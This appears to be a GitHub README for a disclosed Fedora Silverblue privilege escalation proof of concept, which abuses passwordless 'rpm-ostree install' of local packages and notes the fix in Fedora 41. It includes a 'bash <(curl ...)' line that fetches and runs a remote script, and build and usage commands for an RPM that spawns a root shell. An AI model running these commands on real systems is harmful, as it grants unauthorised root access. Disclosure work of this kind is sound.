Update: This behavior was fixed in Fedora 41: GitLab, src.fedoraproject.org
A privilege escalation proof-of-concept for Fedora immutable desktops, using the fact that rpm-ostree install
doesn't ask for the user's password to install local packages.
This is a demonstration that any program running as a member of the wheel
group (e.g., a pip
or npm
package, or curl | bash
) is able to execute arbitrary code as root without user interaction.
bash <(curl https://raw.githubusercontent.com/rohanssrao/silverblue-privesc/main/privesc.sh)
To undo: rpm-ostree remove privesc
Fedora's Privilege Escalation Policy says:
The policy requires that any code which allows an unprivileged user account to perform, or cause to be performed, certain actions must require administrative authentication prior to the action being carried out. The actions are:
- Add, remove, or downgrade any system-wide application or shared resource (packaged or otherwise), with the exception that for installing Fedora-signed packages from administrator-configured repositories, the requirement to ask for a password is waived for members of the wheel group who are local and active.
privesc.rpm
is not Fedora-signed or from an administrator-configured repository, so this behavior can be considered a violation of the policy.
The relevant Polkit rule is here.
Discussions: coreos/rpm-ostree#745, coreos/rpm-ostree#825
Requirements:
dnf install rpmdevtools gcc glibc-static
Building:
rpmbuild --bb --define "_rpmdir $(pwd)" --define "_rpmfilename privesc.rpm" privesc.spec
This generates privesc.rpm
in the current directory. Installing the package creates /usr/bin/privesc
which simply runs bash as root.
Usage:
# Layer package
rpm-ostree install privesc.rpm
# Enter root shell. privesc is placed in the newest deployment
"$(ls -td /ostree/deploy/fedora/deploy/*/ | head -1)"/usr/bin/privesc